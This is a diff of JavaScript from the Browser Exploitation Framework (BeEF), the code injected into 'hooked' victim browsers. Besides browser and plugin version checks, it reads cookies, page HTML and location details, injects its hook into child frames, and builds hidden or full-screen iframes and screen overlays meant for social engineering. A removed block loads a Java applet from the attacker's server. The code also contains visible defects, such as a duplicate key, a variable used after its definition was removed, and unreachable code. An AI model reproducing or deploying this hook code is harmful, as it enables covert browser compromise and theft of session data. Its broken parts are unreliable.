        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 26.
     * @example: beef.browser.isC26iOS()
     */
    isC26iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
    },
    /**
     * Returns true if Chrome 27.
     * @example: beef.browser.isC27()
     */
    isC27:function () {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 27.
     * @example: beef.browser.isC27iOS()
     */
    isC27iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
    },
    /**
     * Returns true if Chrome 28.
     * @example: beef.browser.isC28()
     */
    isC28:function () {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 28.
     * @example: beef.browser.isC28iOS()
     */
    isC28iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
    },
    /**
     * Returns true if Chrome 29.
     * @example: beef.browser.isC29()
     */
    isC29:function () {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 29) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 29.
     * @example: beef.browser.isC29iOS()
     */
    isC29iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false);
    },
    /**
     * Returns true if Chrome 30.
     * @example: beef.browser.isC30()
     */
    isC30:function () {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 30) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 30.
     * @example: beef.browser.isC30iOS()
     */
    isC30iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 30) ? true : false);
    },
    /**
     * Returns true if Chrome 31.
     * @example: beef.browser.isC31()
     */
    isC31:function () {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 31) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 31.
     * @example: beef.browser.isC31iOS()
     */
    isC31iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 31) ? true : false);
    },
    /**
     * Returns true if Chrome.
     * @example: beef.browser.isC()
     */
    isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS();
    },
    /**
@@ -524,12 +748,31 @@ beef.browser = {
            C17:this.isC17(), // Chrome 17
            C18:this.isC18(), // Chrome 18
            C19:this.isC19(), // Chrome 19
            C19iOS:this.isC19iOS(), // Chrome 19 on iOS
            C20:this.isC20(), // Chrome 20
            C20iOS:this.isC20iOS(), // Chrome 20 on iOS
            C21:this.isC21(), // Chrome 21
            C21iOS:this.isC21iOS(), // Chrome 21 on iOS
            C22:this.isC22(), // Chrome 22
            C22iOS:this.isC22iOS(), // Chrome 22 on iOS
            C23:this.isC23(), // Chrome 23
            C23iOS:this.isC23iOS(), // Chrome 23 on iOS
            C24:this.isC24(), // Chrome 24
            C24iOS:this.isC24iOS(), // Chrome 24 on iOS
            C25:this.isC25(), // Chrome 25
            C25iOS:this.isC25iOS(), // Chrome 25 on iOS
            C26:this.isC26(), // Chrome 26
            C26iOS:this.isC26iOS(), // Chrome 26 on iOS
            C27:this.isC27(), // Chrome 27
            C27iOS:this.isC27iOS(), // Chrome 27 on iOS
            C28:this.isC28(), // Chrome 28
            C28iOS:this.isC28iOS(), // Chrome 28 on iOS
            C29:this.isC29(), // Chrome 29
            C29iOS:this.isC29iOS(), // Chrome 29 on iOS
            C30:this.isC30(), // Chrome 30 
            C30iOS:this.isC30iOS(), // Chrome 30 on iOS
            C31:this.isC31(), // Chrome 31
            C31iOS:this.isC31iOS(), // Chrome 31 on iOS
            C:this.isC(), // Chrome any version
            FF2:this.isFF2(), // Firefox 2
@@ -552,8 +795,15 @@ beef.browser = {
            FF17:this.isFF17(), // Firefox 17
            FF18:this.isFF18(), // Firefox 18
            FF19:this.isFF19(), // Firefox 19
-			FF20:this.isFF20(), // Firefox 20
+            FF20:this.isFF20(), // Firefox 20
-            FF:this.isFF(), // Firefox any version
+            FF21:this.isFF21(), // Firefox 21
            FF22:this.isFF22(), // Firefox 22
            FF23:this.isFF23(), // Firefox 23
            FF24:this.isFF24(), // Firefox 24
            FF25:this.isFF25(), // Firefox 25
            FF26:this.isFF26(), // Firefox 26
            FF26:this.isFF27(), // Firefox 27
            FF:  this.isFF(),   // Firefox any version
            IE6:this.isIE6(), // Internet Explorer 6
            IE7:this.isIE7(), // Internet Explorer 7
@@ -566,13 +816,13 @@ beef.browser = {
            O9_60:this.isO9_60(), // Opera 9.60 through 9.64
            O10:this.isO10(), // Opera 10.xx
            O11:this.isO11(), // Opera 11.xx
-            O12:this.isO12(), // Opera 11.xx
+            O12:this.isO12(), // Opera 12.xx
-            O:this.isO(), // Opera any version
+            O:  this.isO(),   // Opera any version
            S4:this.isS4(), // Safari 4.xx
            S5:this.isS5(), // Safari 5.xx
            S6:this.isS6(), // Safari 6.x
-            S:this.isS()    // Safari any version
+            S: this.isS()   // Safari any version
        }
    },
@@ -644,30 +894,106 @@ beef.browser = {
            return '19'
        }
        ;	// Chrome 19
        if (this.isC19iOS()) {
            return '19'
        }
        ;   // Chrome 19 for iOS
        if (this.isC20()) {
            return '20'
        }
        ;	// Chrome 20
        if (this.isC20iOS()) {
            return '20'
        }
        ;   // Chrome 20 for iOS
        if (this.isC21()) {
            return '21'
        }
        ;	// Chrome 21
        if (this.isC21iOS()) {
            return '21'
        }
        ;   // Chrome 21 for iOS
        if (this.isC22()) {
            return '22'
        }
        ;    // Chrome 22
        if (this.isC22iOS()) {
            return '22'
        }
        ;   // Chrome 22 for iOS
        if (this.isC23()) {
            return '23'
        }
        ;    // Chrome 23
        if (this.isC23iOS()) {
            return '23'
        }
        ;   // Chrome 23 for iOS
        if (this.isC24()) {
            return '24'
        }
        ;    // Chrome 24
        if (this.isC24iOS()) {
            return '24'
        }
        ;   // Chrome 24 for iOS
        if (this.isC25()) {
            return '25'
        }
-        ;
+        ;    // Chrome 25
        if (this.isC25iOS()) {
            return '25'
        }
        ;   // Chrome 25 for iOS
        if (this.isC26()) {
            return '26'
        }
        ;    // Chrome 26
        if (this.isC26iOS()) {
            return '26'
        }
        ;   // Chrome 26 for iOS
        if (this.isC27()) {
            return '27'
        }
        ;    // Chrome 27
        if (this.isC27iOS()) {
            return '27'
        }
        ;   // Chrome 27 for iOS
        if (this.isC28()) {
            return '28'
        }
        ;    // Chrome 28
        if (this.isC28iOS()) {
            return '28'
        }
        ;   // Chrome 28 for iOS
        if (this.isC29()) {
            return '29'
        }
        ;    // Chrome 29
        if (this.isC29iOS()) {
            return '29'
        }
        ;   // Chrome 29 for iOS
        if (this.isC30()) {
            return '30'
        }
        ;    // Chrome 30
        if (this.isC30iOS()) {
            return '30'
        }
        ;   // Chrome 30 for iOS
        if (this.isC31()) {
            return '31'
        }
        ;    // Chrome 31
        if (this.isC31iOS()) {
            return '31'
        }
        ;   // Chrome 31 for iOS
        if (this.isFF2()) {
            return '2'
        }
@@ -748,10 +1074,38 @@ beef.browser = {
            return '19'
        }
        ;    // Firefox 19
-		if (this.isFF20()) {
+        if (this.isFF20()) {
-			return '20'
+            return '20'
-		}
+        }
-		;	// Firefox 20
+        ;    // Firefox 20
        if (this.isFF21()) {
            return '21'
        }
        ;    // Firefox 21
        if (this.isFF22()) {
            return '22'
        }
        ;   // Firefox 22
        if (this.isFF23()) {
            return '23'
        }
        ;   // Firefox 23
        if (this.isFF24()) {
            return '24'
        }
        ;   // Firefox 24
        if (this.isFF25()) {
            return '25'
        }
        ;   // Firefox 25
        if (this.isFF26()) {
            return '26'
        }
        ;   // Firefox 26
        if (this.isFF27()) {
            return '27'
        }
        ;   // Firefox 27
        if (this.isIE6()) {
            return '6'
@@ -858,10 +1212,10 @@ beef.browser = {
            try {
                // append hook script
                self.frames[i].document.body.appendChild(script);
-                //console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
+                beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
            } catch (e) {
                // warn on cross-domain
-                //console.log("Hooking frame failed");
+                beef.debug("Hooking child frame failed: "+e.message);
            }
        }
    },
@@ -876,7 +1230,7 @@ beef.browser = {
        if (!this.type().IE) {
            return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
        } else {
-            flash_versions = 11;
+            flash_versions = 12;
            flash_installed = false;
            if (window.ActiveXObject) {
@@ -888,10 +1242,10 @@ beef.browser = {
                        }
                    }
                    catch (e) {
                        beef.debug("Creating Flash ActiveX object failed: "+e.message);
                    }
                }
            }
            ;
            return flash_installed;
        }
    },
@@ -917,7 +1271,7 @@ beef.browser = {
            }
-            // Internet Explorer
+        // Internet Explorer
        } else {
            try {
@@ -925,6 +1279,7 @@ beef.browser = {
                var qt_test = new ActiveXObject('QuickTime.QuickTime');
            } catch (e) {
                beef.debug("Creating QuickTime ActiveX object failed: "+e.message);
            }
            if (qt_test) {
@@ -937,7 +1292,7 @@ beef.browser = {
    },
-	/**
+    /**
     * Checks if the zombie has the RealPlayer plugin installed.
     * @return: {Boolean} true or false.
     *
@@ -958,30 +1313,30 @@ beef.browser = {
            }
-            // Internet Explorer
+        // Internet Explorer
        } else {
-			var definedControls = [
+            var definedControls = [
-			    'RealPlayer',
+              'RealPlayer',
-				'rmocx.RealPlayer G2 Control',
+              'rmocx.RealPlayer G2 Control',
-			    'rmocx.RealPlayer G2 Control.1',
+              'rmocx.RealPlayer G2 Control.1',
-			    'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
+              'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
-			    'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
+              'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
-				];
+            ];
-			for (var i = 0; i < definedControls.length; i++) {
+            for (var i = 0; i < definedControls.length; i++) {
            	try {
-
+                    var rp_test = new ActiveXObject(definedControls[i]);
                	var rp_test = new ActiveXObject(definedControls[i]);
            	} catch (e) {
                    beef.debug("Creating RealPlayer ActiveX object failed: "+e.message);
            	}
-            	if ( rp_test ) {
+                if ( rp_test ) {
-                	realplayer = true;
+                    realplayer = true;
-            	}
+            	
-			}
+                }
            }
        }
        return realplayer;
@@ -1017,6 +1372,7 @@ beef.browser = {
 	            var wmp_test = new ActiveXObject('WMPlayer.OCX');
 	        } catch (e) {
                    beef.debug("Creating WMP ActiveX object failed: "+e.message);
 	        }
 	        if (wmp_test) {
@@ -1045,10 +1401,11 @@ beef.browser = {
            try {
                control = new ActiveXObject("VideoLAN.VLCPlugin.2");
                vlc = true ;
-                } catch(e) {
+            } catch(e) {
-                }
+                    beef.debug("Creating VLC ActiveX object failed: "+e.message);
-        };
+            }
-        return vlc ;
+        }
        return vlc;
    },
    /**
@@ -1058,7 +1415,14 @@ beef.browser = {
     * @example: if(beef.browser.javaEnabled()) { ... }
     */
    javaEnabled:function () {
-        return false;
+        //Use of deployJava defined in deployJava.js (Oracle java deployment toolkit)
        // versionJRE = deployJava.getJREs();
        // if(versionJRE != '')
        //     return true;
        //  else
            return false;
    },
    /**
@@ -1069,8 +1433,9 @@ beef.browser = {
     */
    hasPhonegap:function () {
        var result = false;
        try {
-            if (!!device.phonegap) result = true; else result = false;
+            if (!!device.phonegap || !!device.cordova) result = true; else result = false;
        }
        catch (e) {
            result = false;
@@ -1101,33 +1466,8 @@ beef.browser = {
     */
    hasJava:function () {
-        // Check if Java is enabled
+        return beef.browser.javaEnabled();
        if (!beef.browser.javaEnabled()) {
            return false;
        }
        // This is a temporary fix as this does not work on Safari and Chrome
        // Chrome requires manual user intervention even with unsigned applets.
        // Safari requires a few seconds to load the applet.
        if (beef.browser.isC() || beef.browser.isS()) {
            return true;
        }
        // Inject an unsigned java applet to double check if the Java
        // plugin is working fine.
        try {
            var applet_archive = 'http://' + beef.net.host + ':' + beef.net.port + '/demos/checkJava.jar';
            var applet_id = 'checkJava';
            var applet_name = 'checkJava';
            var output;
            beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava',
                null, applet_archive, null);
            output = document.Microsoft_Corporation.getInfo();
            beef.dom.detachApplet('checkJava');
            return output = 1;
        } catch (e) {
            return false;
        }
    },
    /**
@@ -1436,63 +1776,62 @@ beef.browser = {
    getDetails:function () {
        var details = new Array();
-        var browser_name = beef.browser.getBrowserName();
+        var browser_name     = beef.browser.getBrowserName();
-        var browser_version = beef.browser.getBrowserVersion();
+        var browser_version  = beef.browser.getBrowserVersion();
        var browser_reported_name = beef.browser.getBrowserReportedName();
-        var page_title = (document.title) ? document.title : "Unknown";
+        var page_title       = (document.title) ? document.title : "Unknown";
-        var page_uri = document.location.href;
+        var page_uri         = (document.location.href) ? document.location.href : "Unknown";
-        var page_referrer = (document.referrer) ? document.referrer : "Unknown";
+        var page_referrer    = (document.referrer) ? document.referrer : "Unknown";
-        var hostname = document.location.hostname;
+        var hostname         = (document.location.hostname) ? document.location.hostname : "Unknown";
-        var hostport = (document.location.port) ? document.location.port : "80";
+        var hostport         = (document.location.port) ? document.location.port : "80";
-        var browser_plugins = beef.browser.getPlugins();
+        var browser_plugins  = beef.browser.getPlugins();
-        var date_stamp = new Date().toString();
+        var date_stamp       = new Date().toString();
-        var os_name = beef.os.getName();
+        var os_name          = beef.os.getName();
-        var hw_name = beef.hardware.getName();
+        var hw_name          = beef.hardware.getName();
-        var cpu_type = beef.hardware.cpuType();
+        var cpu_type         = beef.hardware.cpuType();
-        var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
+        var touch_enabled    = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
        var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
        var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
            if (value == true) return value; else if (typeof value == 'object') return value; else return;
        });
-        var screen_size = beef.browser.getScreenSize();
+        var screen_size      = beef.browser.getScreenSize();
-        var window_size = beef.browser.getWindowSize();
+        var window_size      = beef.browser.getWindowSize();
-        var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No";
+        var vbscript_enabled = (beef.browser.hasVBScript()) ?     "Yes" : "No";
-        var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
+        var has_flash        = (beef.browser.hasFlash()) ?        "Yes" : "No";
-        var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
+        var has_phonegap     = (beef.browser.hasPhonegap()) ?     "Yes" : "No";
-        var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
+        var has_googlegears  = (beef.browser.hasGoogleGears()) ?  "Yes" : "No";
-        var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
+        var has_web_socket   = (beef.browser.hasWebSocket()) ?    "Yes" : "No";
-        var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
+        var has_webrtc       = (beef.browser.hasWebRTC()) ?       "Yes" : "No";
-        var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
+        var has_activex      = (beef.browser.hasActiveX()) ?      "Yes" : "No";
-        var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
+        var has_silverlight  = (beef.browser.hasSilverlight()) ?  "Yes" : "No";
-        var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
+        var has_quicktime    = (beef.browser.hasQuickTime()) ?    "Yes" : "No";
-        var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
+        var has_realplayer   = (beef.browser.hasRealPlayer()) ?   "Yes" : "No";
-        var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No"; 
+        var has_wmp          = (beef.browser.hasWMP()) ?          "Yes" : "No"; 
-        var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
+        var has_foxit        = (beef.browser.hasFoxit()) ?        "Yes" : "No";
        var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
        try{
            var cookies = document.cookie;
            var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
            var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
-            if (cookies) details["Cookies"] = cookies;
+            if (cookies) details['Cookies'] = cookies;
-            if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
+            if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
-            if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
+            if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
        }catch(e){
            // the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
            // and there is no reason to read cookies at this point
-            details["Cookies"] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
+            details['Cookies'] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
-            details["hasSessionCookies"] = "No";
+            details['hasSessionCookies'] = "No";
-            details["hasPersistentCookies"] = "No";
+            details['hasPersistentCookies'] = "No";
        }
-        if (browser_name) details["BrowserName"] = browser_name;
+        if (browser_name) details['BrowserName'] = browser_name;
-        if (browser_version) details["BrowserVersion"] = browser_version;
+        if (browser_version) details['BrowserVersion'] = browser_version;
-        if (browser_reported_name) details["BrowserReportedName"] = browser_reported_name;
+        if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name;
-        if (page_title) details["PageTitle"] = page_title;
+        if (page_title) details['PageTitle'] = page_title;
-        if (page_uri) details["PageURI"] = page_uri;
+        if (page_uri) details['PageURI'] = page_uri;
-        if (page_referrer) details["PageReferrer"] = page_referrer;
+        if (page_referrer) details['PageReferrer'] = page_referrer;
-        if (hostname) details["HostName"] = hostname;
+        if (hostname) details['HostName'] = hostname;
-        if (hostport) details["HostPort"] = hostport;
+        if (hostport) details['HostPort'] = hostport;
-        if (browser_plugins) details["BrowserPlugins"] = browser_plugins;
+        if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
        if (os_name) details['OsName'] = os_name;
        if (hw_name) details['Hardware'] = hw_name;
        if (cpu_type) details['CPU'] = cpu_type;
@@ -1502,18 +1841,17 @@ beef.browser = {
        if (browser_type) details['BrowserType'] = browser_type;
        if (screen_size) details['ScreenSize'] = screen_size;
        if (window_size) details['WindowSize'] = window_size;
-        if (java_enabled) details['JavaEnabled'] = java_enabled;
+        if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
-        if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
+        if (has_flash) details['HasFlash'] = has_flash;
-        if (has_flash) details['HasFlash'] = has_flash
+        if (has_phonegap) details['HasPhonegap'] = has_phonegap;
-        if (has_phonegap) details['HasPhonegap'] = has_phonegap
+        if (has_web_socket) details['HasWebSocket'] = has_web_socket;
-        if (has_web_socket) details['HasWebSocket'] = has_web_socket
+        if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
-        if (has_googlegears) details['HasGoogleGears'] = has_googlegears
+        if (has_webrtc) details['HasWebRTC'] = has_webrtc;
        if (has_activex) details['HasActiveX'] = has_activex;
        if (has_silverlight) details['HasSilverlight'] = has_silverlight;
        if (has_quicktime) details['HasQuickTime'] = has_quicktime;
        if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
        if (has_wmp) details['HasWMP'] = has_wmp;
        if (has_vlc) details['HasVLC'] = has_vlc;
        if (has_foxit) details['HasFoxit'] = has_foxit;
        return details;
@@ -1526,6 +1864,13 @@ beef.browser = {
        return !!window.ActiveXObject;
    },
    /**
     * Returns boolean value depending on whether the browser supports WebRTC
     */
    hasWebRTC:function () {
        return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
    },
    /**
     * Returns boolean value depending on whether the browser supports Silverlight
     */
@@ -1655,6 +2000,30 @@ beef.browser = {
        return foxitplugin;
    },
    /**
     * Returns the page head HTML
     **/ 
    getPageHead:function () {
      var html_head;
      try {
        html_head = document.head.innerHTML.toString();
      } catch (e) {
      }
      return html_head;
    },
    /**
     * Returns the page body HTML
     **/
    getPageBody:function() {
      var html_body;
      try {
        html_body = document.body.innerHTML.toString();
      } catch (e) {
      }
      return html_body;
    },
    /**
     * Dynamically changes the favicon: works in Firefox, Chrome and Opera
     **/
--- a/core/main/client/browser/cookie.js
+++ b/core/main/client/browser/cookie.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/browser/popup.js
+++ b/core/main/client/browser/popup.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -76,6 +76,30 @@ beef.dom = {
 		return iframe;
 	},
 	/**
 	 * Returns the highest current z-index
 	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
 	 * @return: {Integer} Highest z-index in the DOM
 	 * OR
 	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
 	 */
 	getHighestZindex: function(include_id) {
 		var highest = {'height':0, 'elem':''};
 		$j('*').each(function() {
 			var current_high = parseInt($j(this).css("zIndex"),10);
 			if (current_high > highest.height) {
 				highest.height = current_high;
 				highest.elem = $j(this).attr('id');
 			}
 		});
 		if (include_id) {
 			return highest;
 		} else {
 			return highest.height;
 		}
 	},
 	/**
     * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -95,8 +119,15 @@ beef.dom = {
 			var form_action = params['src'];
 			params['src'] = '';
 		}
-		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
+		if (type == 'hidden') {
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
+			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
 		} else if (type == 'fullscreen') {
 			css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
 			$j('body').css({'padding':'0px', 'margin':'0px'});
 		} else {
 			css = styles;
 			$j('body').css({'padding':'0px', 'margin':'0px'});
 		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		if (form_submit && form_action)
@@ -127,6 +158,75 @@ beef.dom = {
            }
        });
    },
    /**
     * Load a full screen div that is black, or, transparent
     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
     *           // By default this is 70 
     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
     *           // By default this will use beef.dom.getHighestZindex to always go to the top
     *         bgcolor: (#xxxxxx)    // Standard RGB Hex color code
     *           // By default this is #000000
     */
 	grayOut: function(vis, options) {
 	  // in any order.  Pass only the properties you need to set.
 	  var options = options || {};
 	  var zindex = options.zindex || beef.dom.getHighestZindex()+1;
 	  var opacity = options.opacity || 70;
 	  var opaque = (opacity / 100);
 	  var bgcolor = options.bgcolor || '#000000';
 	  var dark=document.getElementById('darkenScreenObject');
 	  if (!dark) {
 	    // The dark layer doesn't exist, it's never been created.  So we'll
 	    // create it here and apply some basic styles.
 	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
 	    var tbody = document.getElementsByTagName("body")[0];
 	    var tnode = document.createElement('div');           // Create the layer.
 	        tnode.style.position='absolute';                 // Position absolutely
 	        tnode.style.top='0px';                           // In the top
 	        tnode.style.left='0px';                          // Left corner of the page
 	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
 	        tnode.style.display='none';                      // Start out Hidden
 	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
 	    tbody.appendChild(tnode);                            // Add it to the web page
 	    dark=document.getElementById('darkenScreenObject');  // Get the object.
 	  }
 	  if (vis) {
 	    // Calculate the page width and height 
 	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
 	        var pageWidth = document.body.scrollWidth+'px';
 	        var pageHeight = document.body.scrollHeight+'px';
 	    } else if( document.body.offsetWidth ) {
 	      var pageWidth = document.body.offsetWidth+'px';
 	      var pageHeight = document.body.offsetHeight+'px';
 	    } else {
 	       var pageWidth='100%';
 	       var pageHeight='100%';
 	    }
 	    //set the shader to cover the entire page and make it visible.
 	    dark.style.opacity=opaque;
 	    dark.style.MozOpacity=opaque;
 	    dark.style.filter='alpha(opacity='+opacity+')';
 	    dark.style.zIndex=zindex;
 	    dark.style.backgroundColor=bgcolor;
 	    dark.style.width= pageWidth;
 	    dark.style.height= pageHeight;
 	    dark.style.display='block';
 	  } else {
 	     dark.style.display='none';
 	  }
 	},
 	/**
 	 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
 	 *  or, re-writing a document this is useful.
 	 */
 	removeStylesheets: function() {
 		$j('link[rel=stylesheet]').remove();
 		$j('style').remove();
 	},
 	/**
     * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -284,7 +384,8 @@ beef.dom = {
            if (codebase != null) {
                content += "<param name='codebase' value='" + codebase + "' />"
-            }else{
+            }
            if (archive != null){
                content += "<param name='archive' value='" + archive + "' />";
            }
            if (params != null) {
@@ -292,7 +393,7 @@ beef.dom = {
            }
            content += "</object>";
        }
-        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
+        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
            if (codebase != null) {
                content = "" +
@@ -311,24 +412,25 @@ beef.dom = {
            }
            content += "</applet>";
        }
-        if (beef.browser.isFF()) {
+        // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
-            if (codebase != null) {
+//        if (beef.browser.isFF()) {
-                content = "" +
+//            if (codebase != null) {
-                    "<embed id='" + id + "' code='" + code + "' " +
+//                content = "" +
-                    "type='application/x-java-applet' codebase='" + codebase + "' " +
+//                    "<embed id='" + id + "' code='" + code + "' " +
-                    "height='0' width='0' name='" + name + "'>";
+//                    "type='application/x-java-applet' codebase='" + codebase + "' " +
-            } else {
+//                    "height='0' width='0' name='" + name + "'>";
-                content = "" +
+//            } else {
-                    "<embed id='" + id + "' code='" + code + "' " +
+//                content = "" +
-                    "type='application/x-java-applet' archive='" + archive + "' " +
+//                    "<embed id='" + id + "' code='" + code + "' " +
-                    "height='0' width='0' name='" + name + "'>";
+//                    "type='application/x-java-applet' archive='" + archive + "' " +
-            }
+//                    "height='0' width='0' name='" + name + "'>";
-
+//            }
-            if (params != null) {
+//
